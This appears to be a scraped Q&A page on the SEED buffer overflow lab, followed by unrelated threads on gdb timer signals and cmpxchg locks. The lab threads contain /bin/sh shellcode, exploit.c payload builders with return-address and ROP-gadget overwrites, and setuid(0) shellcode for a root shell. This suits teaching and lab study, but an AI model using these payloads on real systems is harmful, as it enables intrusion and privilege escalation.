Buffer Overflow, modified Seedlab question? - c

In this lab, I have exploit.c, stack.c and call_shellcode.c. stack.c has been modified so that it prints out the buffer address and the ebp address. I am running this on a virtual machine, Ubuntu 12.04 32-bit.
I have to use the vulnerable program stack.c and put code in exploit.c in order to create a shell when running my stack executable. Any help is appreciated.
stack.c is below. Sorry for the bad indentation; the actual code has proper indentation.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
unsigned long int sp;
/*
 * Copies str into a 12-byte stack buffer with strcpy(), which performs no
 * bounds check; this is the deliberately vulnerable function of the lab.
 * Also prints the current value of %ebp and the address of the buffer.
 * Always returns 1.
 */
int cp(char *str)
{
// unsigned long int sp;
char buffer[12];
/* Store the current frame pointer (%ebp) in the file-scope variable sp. */
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);
/* Unbounded copy: any str longer than 11 characters writes past buffer. */
strcpy(buffer, str);
printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}
/*
 * Reads up to 517 bytes from the file "badfile" into str, passes str to
 * cp(), prints "Returned Properly" and returns 1.
 */
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
/* NOTE(review): the fopen() result is not checked before being given to fread(). */
badfile = fopen("badfile", "r");
/* NOTE(review): fread() does not NUL-terminate str and its return value is ignored. */
fread(str, sizeof(char), 517, badfile);
cp(str);
printf("Returned Properly\n");
return 1;
}
And exploit.c is down below.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Raw machine code, annotated per instruction below. According to those
 * annotations it pushes the string "/bin//sh" onto the stack and executes
 * int $0x80 with %al set to 0x0b.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * Template that writes a 517-byte file "./badfile" consisting of 0x90 bytes.
 * The contents are meant to be customised at the marked placeholder.
 *
 * Returns EXIT_SUCCESS when the file was written completely, EXIT_FAILURE
 * (after reporting the error with perror) when it could not be opened,
 * written or closed.
 */
int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    (void) argc;
    (void) argv;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, sizeof buffer);

    /* You need to fill the buffer with appropriate contents here */

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    if (badfile == NULL) {
        perror("fopen ./badfile");
        return EXIT_FAILURE;
    }
    if (fwrite(buffer, sizeof buffer, 1, badfile) != 1) {
        perror("fwrite ./badfile");
        fclose(badfile);
        return EXIT_FAILURE;
    }
    /* fclose() flushes buffered data, so a failure here means a short file. */
    if (fclose(badfile) != 0) {
        perror("fclose ./badfile");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}
I have run gdb on my stack executable, compiled with gcc -o stack -z execstack -fno-stack-protector stack.c, and have found the buffer to be at address 0xbffff134 and ebp at 0xbffff148. I understand I have to somehow find my return address and make my payload be at that address? Some help regarding the buffer overflow in this assignment is needed, please.

You need to bypass ASLR; refer to the link below:
https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/
Find gadget:
pop ebx; ret; // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]
construct eax and ebx value
write the ESP value to the 0804a020 memory, then execute it
Modified exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Raw machine code, annotated per instruction below. According to those
 * annotations it pushes the string "/bin//sh" onto the stack and executes
 * int $0x80 with %al set to 0x0b.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * Writes a 517-byte file "./badfile": the buffer is filled with 0x90 bytes,
 * words 6..18 (viewed through val) are overwritten with the constants below,
 * and the shellcode array, including its terminating NUL, is copied in
 * starting at word 19. Returns 0.
 */
int main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
int i;
/* Word-sized view of buffer; assumes 4-byte unsigned int so val[k] is byte offset 4*k. */
/* NOTE(review): buffer is a char array; this cast relies on it being suitably aligned. */
unsigned int *val = (unsigned int*)buffer;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* The hard-coded addresses below are specific to the answerer's build of the target. */
val[6] = 0x08048378; /* pop ebx; ret; */
val[7] = 0xaaa9a03c; /* ebx */
/* Eight consecutive copies of the same address occupy words 8..15. */
for(i=8; i<16; i++)
val[i] = 0x0804847c; /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
val[16] = 0x08048378; /* pop ebx; ret; */
val[17] = 0xfffffff8; /* ebx */
val[18] = 0x08048462; /* add dword [ebx+0x0804A028], esp; */
/* call dword [0x08049F1C+eax*4] */
memcpy(&val[19], shellcode, sizeof(shellcode));
/* Save the contents to the file "badfile" */
/* NOTE(review): the fopen() result is not checked before fwrite()/fclose(). */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
return 0;
}

Related

Can't Get Root Shell on Buffer Overflow Assignment

I am working on an assignment (see http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/) and, when I run ./stack, I end up with Trace/breakpoint trap instead of the root shell. The following is my code for exploit.c (which creates badfile) and stack.c (which reads badfile in and uses strcpy to copy it into a buffer that isn't big enough to handle it).
exploit.c
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Raw machine code, annotated per instruction below. According to those
 * annotations it pushes the string "/bin//sh" onto the stack and executes
 * int $0x80 with %al set to 0x0b.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * Writes a 517-byte file "./badfile": the buffer is filled with 0x90 bytes,
 * four bytes at offsets 36..39 are overwritten, and the shellcode string is
 * copied to offset 492.
 * NOTE(review): main is declared void here; standard C expects int main.
 */
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Bytes 36..39 become 0x40 0xf1 0xff 0xbf, i.e. 0xbffff140 when read little-endian. */
memset(buffer + 39, 0xbf, 1);
memset(buffer + 38, 0xff, 1);
memset(buffer + 37, 0xf1, 1);
memset(buffer + 36, 0x40, 1);
/* strcpy() also writes the terminating NUL after the shellcode bytes. */
strcpy(buffer + 492, shellcode);
/* Save the contents to the file "badfile" */
/* NOTE(review): the fopen() result is not checked before fwrite()/fclose(). */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Copies str into a 24-byte stack buffer with strcpy(), which performs no
 * bounds check; this is the deliberately vulnerable function of the lab.
 * Always returns 1.
 */
int bof(char *str)
{
char buffer[24];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
/*
 * Reads up to 517 bytes from the file "badfile" into str, passes str to
 * bof(), prints "Returned Properly" and returns 1.
 */
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
/* NOTE(review): the fopen() result is not checked before being given to fread(). */
badfile = fopen("badfile", "r");
/* NOTE(review): fread() does not NUL-terminate str and its return value is ignored. */
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
I compiled stack.c and set permissions as root with
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c
root:/home/seed# chown root stack
root:/home/seed# chmod 4755 stack
I compiled exploit.c as myself (seed) with
seed:~$ gcc -g -o exploit exploit.c
I run ./exploit to create badfile, and get no errors. I run ./stack and get Trace/breakpoint trap.
If I run gdb stack I get the shell, but it is not the root shell.
gdb-peda$ run
Starting program: /home/seed/stack
process 24232 is executing new program: /bin/dash
$
If I run seed:~$ ./stack -D_FORTIFY_SOURCE=0 I get the shell, but once again it isn't root.
seed:~$ ./stack -D_FORTIFY_SOURCE=0
$ id
uid=1000(seed) gid=1000(seed)
$
So, what do I need to change to get a root shell?
I guess, you can add setuid() and setgid() syscall in your shellcode.
/*
 * Variant of the shellcode with two extra 8-byte sequences prepended; the
 * per-line annotations describe them as setuid(0) and setgid(0) calls made
 * before the original instructions run.
 */
char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0);
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
Of course, change owner to root

debugging with timer/signal always ends up in <timer_settime+16>

I am using gdb to debug a code that starts a timer. When the timer rings in gdb I always end up at instruction timer_settime+16.
Is this expected behavior?
As an example I slightly modified the code of timer_settime man page. The idea is to pass two arguments: a string of integers and a nsec value. The code launches the timer to ring after nsec, then copies the string.
I expected that by incrementing the nsec value, gdb would stop at different code lines, eventually ending up inside the copy loop. However, it always stops at <timer_settime+16>.
So is this expected behavior?
Is it documented somewhere?
Is there a way to achieve what I expected (i.e.: launch a timer that when ring makes gdb stops where the program was just before (or after) the signal)? (always with nsec granularity).
Code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <time.h>
#define CLOCKID CLOCK_REALTIME
#define SIG SIGUSR1
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
unsigned char OUT[32];
unsigned char IN[32];
/*
 * Converts one ASCII hexadecimal digit to its numeric value.
 *
 * in: a character in '0'..'9', 'a'..'f' or 'A'..'F'.
 * Returns 0..15 for a valid digit. Any other character yields 0, so the
 * result is always defined (previously it was an uninitialized value).
 */
unsigned char ascii2hex(char in){
    unsigned char out = 0;

    if (in >= '0' && in <= '9')
        out = (unsigned char)(in - '0');
    else if (in >= 'A' && in <= 'F')
        out = (unsigned char)(in - 'A' + 10);
    else if (in >= 'a' && in <= 'f')
        out = (unsigned char)(in - 'a' + 10);

    return out;
}
/*
 * Packs pairs of ASCII hex digits from `in` into bytes of `out`.
 *
 * in:  source characters; characters in[0] .. in[len-1] are consumed.
 * out: destination; receives len / 2 bytes, high nibble first.
 * len: number of input characters. A trailing unpaired character (odd len)
 *      is ignored instead of being combined with in[len], which lies outside
 *      the range the caller described.
 */
void asciiStr2hex(char * in, unsigned char * out, unsigned int len){
    unsigned int src;
    unsigned int dst = 0;

    /* Unsigned index avoids the signed/unsigned comparison against len. */
    for (src = 0; src + 1 < len; src += 2) {
        out[dst++] = (unsigned char)((ascii2hex(in[src]) << 4) + ascii2hex(in[src + 1]));
    }
}
/*
 * Copies len bytes from in to out, one byte at a time in ascending
 * address order.
 */
void testcode(unsigned char *out, unsigned char *in, unsigned int len){
    unsigned char *dst = out;
    unsigned char *src = in;
    unsigned int remaining = len;

    while (remaining != 0) {
        *dst++ = *src++;
        remaining--;
    }
}
/*
 * Prints the pointer carried in si->si_value, the timer ID it points to,
 * and that timer's overrun count. Exits via errExit() if
 * timer_getoverrun() fails.
 */
static void print_siginfo(siginfo_t *si)
{
    timer_t *timer = si->si_value.sival_ptr;
    int overruns;

    printf(" sival_ptr = %p; ", si->si_value.sival_ptr);
    printf(" *sival_ptr = 0x%lx\n", (long) *timer);

    overruns = timer_getoverrun(*timer);
    if (overruns != -1) {
        printf(" overrun count = %d\n", overruns);
        return;
    }
    errExit("timer_getoverrun");
}
/*
 * Signal handler: reports the signal number, prints the associated timer
 * information, then sets the signal's disposition to SIG_IGN.
 */
static void handler(int sig, siginfo_t *si, void *uc)
{
    (void) uc;  /* context argument is not used */

    /* printf() is not async-signal-safe (see signal(7)), so using it in a
       handler is not strictly correct. */
    printf("Caught signal %d\n", sig);
    print_siginfo(si);

    signal(sig, SIG_IGN);
}
int main(int argc, char *argv[])
{
timer_t timerid;
struct sigevent sev;
struct itimerspec its;
long long freq_nanosecs;
//sigset_t mask;
struct sigaction sa;
if (argc != 3) {
fprintf(stderr, "Usage: %s <16byte> <time-nanosecs>\n",
argv[0]);
exit(EXIT_FAILURE);
}
asciiStr2hex(argv[1], IN, 32);
/* Establish handler for timer signal */
printf("Establishing handler for signal %d\n", SIG);
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = handler;
sigemptyset(&sa.sa_mask);
if (sigaction(SIG, &sa, NULL) == -1)
errExit("sigaction");
/* Block timer signal temporarily */
/* printf("Blocking signal %d\n", SIG);
sigemptyset(&mask);
sigaddset(&mask, SIG);
if (sigprocmask(SIG_SETMASK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
/* Create the timer */
sev.sigev_notify = SIGEV_SIGNAL;
sev.sigev_signo = SIG;
sev.sigev_value.sival_ptr = &timerid;
if (timer_create(CLOCKID, &sev, &timerid) == -1)
errExit("timer_create");
printf("timer ID is 0x%lx\n", (long) timerid);
/* Start the timer */
freq_nanosecs = atoll(argv[2]);
its.it_value.tv_sec = freq_nanosecs / 1000000000;
its.it_value.tv_nsec = freq_nanosecs % 1000000000;
its.it_interval.tv_sec = its.it_value.tv_sec;
its.it_interval.tv_nsec = its.it_value.tv_nsec;
if (timer_settime(timerid, 0, &its, NULL) == -1)
errExit("timer_settime");
/* Sleep for a while; meanwhile, the timer may expire
multiple times */
printf("Sleeping for %d seconds\n", atoi(argv[1]));
testcode(OUT, IN, 16);
/* Unlock the timer signal, so that timer notification
can be delivered */
/* printf("Unblocking signal %d\n", SIG);
if (sigprocmask(SIG_UNBLOCK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
exit(EXIT_SUCCESS);
}
When debug into gdb with r 00112233445566778899001122334455 2
I obtain:
Program received signal SIGUSR1, User defined signal 1.
0x76fc7c38 in timer_settime () from /lib/arm-linux-gnueabihf/librt.so.1
(gdb) x/30i $pc
=> 0x76fc7c38 <timer_settime+16>: cmn r0, #4096 ; 0x1000
0x76fc7c3c <timer_settime+20>: mov r4, r0
0x76fc7c40 <timer_settime+24>: bhi 0x76fc7c4c <timer_settime+36>
0x76fc7c44 <timer_settime+28>: mov r0, r4
0x76fc7c48 <timer_settime+32>: pop {r3, r4, r7, pc}
0x76fc7c4c <timer_settime+36>: bl 0x76fc55b4
0x76fc7c50 <timer_settime+40>: rsb r3, r4, #0
0x76fc7c54 <timer_settime+44>: mvn r4, #0
0x76fc7c58 <timer_settime+48>: str r3, [r0]
0x76fc7c5c <timer_settime+52>: b 0x76fc7c44 <timer_settime+28>
0x76fc7c60 <timer_settime+56>: andeq r0, r0, r2, lsl #2
0x76fc7c64: push {r4, r5, r6, r7, r8, r9, r10, lr}
0x76fc7c68: sub sp, sp, #600 ; 0x258
0x76fc7c6c: ldr r4, [pc, #340] ; 0x76fc7dc8
0x76fc7c70: add r1, sp, #512 ; 0x200
0x76fc7c74: add r4, pc, r4
0x76fc7c78: mov r0, r4
0x76fc7c7c: bl 0x76fc56b0
0x76fc7c80: cmp r0, #0
0x76fc7c84: bne 0x76fc7c98
0x76fc7c88: ldr r2, [sp, #512] ; 0x200
0x76fc7c8c: ldr r3, [pc, #312] ; 0x76fc7dcc
0x76fc7c90: cmp r2, r3
0x76fc7c94: beq 0x76fc7d94
0x76fc7c98: ldr r5, [pc, #304] ; 0x76fc7dd0
0x76fc7c9c: ldr r0, [pc, #304] ; 0x76fc7dd4
0x76fc7ca0: add r5, pc, r5
0x76fc7ca4: add r0, pc, r0
0x76fc7ca8: mov r1, r5
0x76fc7cac: bl 0x76fc5524
I am running this code on a Raspberry Pi, but I'm pretty sure I had the same behavior on another Linux machine (x86_64).
I have tested with "handle stop SIGUSR1".
I finally found that the problem was that I have to set unwindonsignal off in gdb to obtain the behavior I expected.

gcc built-in synchronization functions and cmpxchg

I've been trying to implement a lock by writing the asm code manually, and since that code didn't work, I used __sync_bool_compare_and_swap to look at the disassembly.
However, the built-in function does not seem to work either.
I'm using Ubuntu 15.10 x64
Here's the general structure of the program.
Global:
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <time.h>
#include <stdbool.h>
#include <unistd.h>
unsigned int randrange(unsigned int min, unsigned int max); // custom rand function
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER; // real mutex
__volatile__ unsigned int lock = 1; // my attempt
unsigned int i = 0, count = 0;
Thread function:
/*
 * Thread body (general structure): picks a random iteration count and nap
 * length, adds the iteration count to `count` under `mutex`, increments the
 * global `i` once per iteration with a short sleep in between, then writes
 * 1 to `lock` and exits the thread with the value `true`.
 */
void *worker(void *arg)
{
    unsigned int iterations = randrange(1000, 10000);
    unsigned int nap_us = randrange(10, 100);
    unsigned int remaining;

    (void) arg;

    /* Record the planned number of iterations under the real mutex. */
    pthread_mutex_lock(&mutex);
    count += iterations;
    pthread_mutex_unlock(&mutex);

    /* Acquire the custom lock */

    remaining = iterations;
    while (remaining != 0) {
        i++;                /* one increment per iteration */
        usleep(nap_us);     /* short nap */
        remaining--;
    }

    __sync_synchronize();   /* full barrier before the release store */
    lock = 1;               /* release the custom lock */

    pthread_exit((void*) true);
}
Main:
/*
 * Starts 1000 joinable worker threads, waits for all of them, then prints
 * the iteration total recorded under the mutex (`count`) next to the value
 * of the shared counter `i` so the two can be compared.
 *
 * Returns 0 on success, -1 if a thread could not be created or joined.
 */
int main()
{
    enum { NTHREADS = 1000 };
    pthread_t thread_id[NTHREADS];
    pthread_attr_t attr;
    int ret_thread = 0;         /* pthread_* return an int error code */
    void *status = NULL;
    unsigned int args = 0;

    pthread_attr_init(&attr);
    pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE);

    /* The loop index is named t so it does not shadow the global counter i. */
    for(int t = 0; t < NTHREADS; t++)
    {
        ret_thread = pthread_create(&thread_id[t], &attr, worker,
                                    (void *) &args);
        if(ret_thread)
        {
            printf("Error occurred during thread creation. "
                   "n: %i - return code: %i", t, ret_thread);
            pthread_attr_destroy(&attr);
            return -1;
        }
    }
    pthread_attr_destroy(&attr);

    for(int t = 0; t < NTHREADS; t++)
    {
        ret_thread = pthread_join(thread_id[t], &status);
        if(ret_thread)
        {
            printf("Error occurred during thread joining. "
                   "n: %i - return code: %i", t, ret_thread);
            return -1;
        }
    }

    puts("\nmain: All the threads exited normally.\n");
    /* core: compare the safely recorded iteration total with the shared counter */
    printf("count: %u - i: %u\n", count, i);
    puts("\n\nmain: I've finished, bye.\n");

    pthread_mutex_destroy(&mutex);
    return 0;
}
Since cmpxchg source, destination compares the accumulator (register A) with the destination operand, so that
if accumulator == destination then ZF is set and the source is copied into the destination and
if accumulator != destination then ZF is reset and the destination is copied into the accumulator...
My attempt:
/*
 * Thread body using a hand-written compare-and-exchange spin loop as the
 * lock: records the iteration count under `mutex`, spins until the
 * cmpxchg succeeds, increments the global `i` once per iteration, then
 * writes 1 to `lock` and exits the thread.
 */
void *worker(void *arg)
{
unsigned int loop = randrange(1000, 10000), time = randrange(10, 100);
pthread_mutex_lock(&mutex);
count += loop; // safe keep trace of number of iterations
pthread_mutex_unlock(&mutex);
/* My attempt */
prepare:
/* r8 = 0: the value to store into `lock` when the exchange succeeds. */
__asm__ __volatile__ ("xor %r8, %r8");
wait:
/* rax = 1 is the expected ("free") value compared against `lock`. */
/* NOTE(review): cmpxchgq is an 8-byte operation, while `lock` appears to be
   declared as unsigned int in this file; confirm the operand size. */
/* NOTE(review): none of these asm statements lists outputs or clobbers, so
   the compiler is not told that r8, rax, flags and memory change. */
__asm__ __volatile__ ("nop \n\t"
"mov $0x1, %rax \n\t"
"lock; cmpxchgq %r8, (lock)");
/* Retry while the comparison failed (ZF clear). */
/* NOTE(review): this relies on the flags surviving between two separate asm
   statements; verify against the GCC inline-asm documentation. */
__asm__ __volatile__ goto ("jne %l0" :::: wait);
/* My attempt */
for(int x = 0; x < loop; x++)
{
i++; // increment i by number of iterations with a step=1
usleep(time); // short nap
}
__sync_synchronize(); // built-in full barriers
lock = 1; // release the custom lock
pthread_exit((void*) true);
}
Disassembly:
(gdb) disas worker
Dump of assembler code for function worker:
0x0000000000400c70 <+0>: push %r12
0x0000000000400c72 <+2>: push %rbp
0x0000000000400c73 <+3>: mov $0x2710,%esi
0x0000000000400c78 <+8>: push %rbx
0x0000000000400c79 <+9>: mov $0x3e8,%edi
0x0000000000400c7e <+14>: callq 0x400c20 <randrange>
0x0000000000400c83 <+19>: mov $0x32,%esi
0x0000000000400c88 <+24>: mov $0x1,%edi
0x0000000000400c8d <+29>: mov %eax,%ebp
0x0000000000400c8f <+31>: callq 0x400c20 <randrange>
0x0000000000400c94 <+36>: mov $0x602100,%edi
0x0000000000400c99 <+41>: mov %eax,%r12d
0x0000000000400c9c <+44>: callq 0x4009d0 <pthread_mutex_lock#plt>
0x0000000000400ca1 <+49>: mov $0x602100,%edi
0x0000000000400ca6 <+54>: add %ebp,0x201434(%rip) # 0x6020e0 <count>
0x0000000000400cac <+60>: callq 0x400980 <pthread_mutex_unlock#plt>
0x0000000000400cb1 <+65>: nopl 0x0(%rax)
0x0000000000400cb8 <+72>: nop
0x0000000000400cb9 <+73>: xor %r8,%r8
0x0000000000400cbc <+76>: mov $0x1,%rax
0x0000000000400cc3 <+83>: lock cmpxchg %r8,0x6020b8 # 0x6020b8 <lock>
0x0000000000400ccd <+93>: jne 0x400cb8 <worker+72>
0x0000000000400ccf <+95>: xor %ebx,%ebx
0x0000000000400cd1 <+97>: test %ebp,%ebp
0x0000000000400cd3 <+99>: je 0x400cee <worker+126>
0x0000000000400cd5 <+101>: nopl (%rax)
0x0000000000400cd8 <+104>: mov %r12d,%edi
0x0000000000400cdb <+107>: add $0x1,%ebx
0x0000000000400cde <+110>: addl $0x1,0x2013ff(%rip) # 0x6020e4 <i>
0x0000000000400ce5 <+117>: callq 0x4009f0 <usleep#plt>
0x0000000000400cea <+122>: cmp %ebp,%ebx
0x0000000000400cec <+124>: jne 0x400cd8 <worker+104>
0x0000000000400cee <+126>: mov $0x1,%edi
0x0000000000400cf3 <+131>: mfence
0x0000000000400cf6 <+134>: movl $0x1,0x2013b8(%rip) # 0x6020b8 <lock>
0x0000000000400d00 <+144>: callq 0x400990 <pthread_exit#plt>
End of assembler dump.
With __sync_bool_compare_and_swap():
/*
 * Thread body using __sync_bool_compare_and_swap() as a spin lock.
 *
 * Lock convention used by this file: `lock` == 1 means free, 0 means held.
 * The thread records its iteration count under `mutex`, acquires the spin
 * lock, increments the global `i` once per iteration, releases the lock by
 * storing 1, and exits the thread with the value `true`.
 */
void *worker(void *arg)
{
    unsigned int loop = randrange(1000, 10000), nap_us = randrange(10, 100);

    (void) arg;

    pthread_mutex_lock(&mutex);
    count += loop;  /* safely keep track of the number of iterations */
    pthread_mutex_unlock(&mutex);

    /* Acquire: atomically change lock from 1 (free) to 0 (held). */
    while(!__sync_bool_compare_and_swap(&lock, 1, 0))
    {
        /* Wait with plain reads while the lock is HELD (0) and retry the
           atomic exchange once it looks free. The previous condition,
           while(lock), spun while the lock was free, so a waiter could
           stay here until some other thread took the lock, or forever if
           no other thread was left. */
        while(!lock) __asm__ __volatile__ ("nop");
    }

    for(unsigned int x = 0; x < loop; x++)
    {
        i++;            /* one increment per iteration */
        usleep(nap_us); /* short nap */
    }

    __sync_synchronize();   /* full barrier before the release store */
    lock = 1;               /* release the custom lock */
    pthread_exit((void*) true);
}
Disassembly:
(gdb) disas worker
Dump of assembler code for function worker:
0x0000000000400c70 <+0>: push %r12
0x0000000000400c72 <+2>: push %rbp
0x0000000000400c73 <+3>: mov $0x2710,%esi
0x0000000000400c78 <+8>: push %rbx
0x0000000000400c79 <+9>: mov $0x3e8,%edi
0x0000000000400c7e <+14>: callq 0x400c20 <randrange>
0x0000000000400c83 <+19>: mov $0x32,%esi
0x0000000000400c88 <+24>: mov $0x1,%edi
0x0000000000400c8d <+29>: mov %eax,%ebx
0x0000000000400c8f <+31>: callq 0x400c20 <randrange>
0x0000000000400c94 <+36>: mov $0x602100,%edi
0x0000000000400c99 <+41>: mov %eax,%ebp
0x0000000000400c9b <+43>: callq 0x4009d0 <pthread_mutex_lock#plt>
0x0000000000400ca0 <+48>: mov $0x602100,%edi
0x0000000000400ca5 <+53>: add %ebx,0x201435(%rip) # 0x6020e0 <count>
0x0000000000400cab <+59>: callq 0x400980 <pthread_mutex_unlock#plt>
0x0000000000400cb0 <+64>: mov $0x1,%ecx
0x0000000000400cb5 <+69>: xor %edx,%edx
0x0000000000400cb7 <+71>: nopw 0x0(%rax,%rax,1)
0x0000000000400cc0 <+80>: mov %ecx,%eax
0x0000000000400cc2 <+82>: lock cmpxchg %edx,0x2013ee(%rip) # 0x6020b8 <lock>
0x0000000000400cca <+90>: je 0x400cdd <worker+109>
0x0000000000400ccc <+92>: nopl 0x0(%rax)
0x0000000000400cd0 <+96>: mov 0x2013e2(%rip),%eax # 0x6020b8 <lock>
0x0000000000400cd6 <+102>: test %eax,%eax
0x0000000000400cd8 <+104>: je 0x400cc0 <worker+80>
0x0000000000400cda <+106>: nop
0x0000000000400cdb <+107>: jmp 0x400cd0 <worker+96>
0x0000000000400cdd <+109>: xor %r12d,%r12d
0x0000000000400ce0 <+112>: test %ebx,%ebx
0x0000000000400ce2 <+114>: je 0x400cfb <worker+139>
0x0000000000400ce4 <+116>: mov %ebp,%edi
0x0000000000400ce6 <+118>: add $0x1,%r12d
0x0000000000400cea <+122>: addl $0x1,0x2013f3(%rip) # 0x6020e4 <i>
0x0000000000400cf1 <+129>: callq 0x4009f0 <usleep#plt>
0x0000000000400cf6 <+134>: cmp %ebx,%r12d
0x0000000000400cf9 <+137>: jne 0x400ce4 <worker+116>
0x0000000000400cfb <+139>: mov $0x1,%edi
0x0000000000400d00 <+144>: mfence
0x0000000000400d03 <+147>: movl $0x1,0x2013ab(%rip) # 0x6020b8 <lock>
0x0000000000400d0d <+157>: callq 0x400990 <pthread_exit#plt>
End of assembler dump.
The built-in function produce more code:
0x0000000000400cb0 <+64>: mov $0x1,%ecx
0x0000000000400cb5 <+69>: xor %edx,%edx
0x0000000000400cb7 <+71>: nopw 0x0(%rax,%rax,1)
0x0000000000400cc0 <+80>: mov %ecx,%eax
0x0000000000400cc2 <+82>: lock cmpxchg %edx,0x2013ee(%rip) # 0x6020b8 <lock>
0x0000000000400cca <+90>: je 0x400cdd <worker+109>
0x0000000000400ccc <+92>: nopl 0x0(%rax)
0x0000000000400cd0 <+96>: mov 0x2013e2(%rip),%eax # 0x6020b8 <lock>
0x0000000000400cd6 <+102>: test %eax,%eax
0x0000000000400cd8 <+104>: je 0x400cc0 <worker+80>
0x0000000000400cda <+106>: nop
0x0000000000400cdb <+107>: jmp 0x400cd0 <worker+96>
What does the code between offsets +96 and +107 do?
I don't think the built-in function produces useless code, so I want to understand what I have misunderstood.
The built-in function works only sometimes, which means that it doesn't really work at all!
UPDATE:
I've retested the implementation with the built-in and it works.
How should I proceed?

Creating buffer overflow in C (seg fault)

Since our security course doesn't have a lab, I'm trying to solve the SEED project's lab:
http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/Buffer_Overflow.pdf
But there seems to be a problem: the code does not perform the exploit; instead it gives a segmentation fault. Is there something else that must be added to the code in order to make it functional?
The lab says that i have to edit the code below
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Raw machine code, annotated per instruction below. According to those
 * annotations it pushes the string "/bin//sh" onto the stack and executes
 * int $0x80 with %al set to 0x0b.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * Template that writes a 517-byte file "./badfile" consisting of 0x90 bytes.
 * The contents are meant to be customised at the marked placeholder.
 *
 * Returns EXIT_SUCCESS when the file was written completely, EXIT_FAILURE
 * (after reporting the error with perror) when it could not be opened,
 * written or closed.
 */
int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    (void) argc;
    (void) argv;

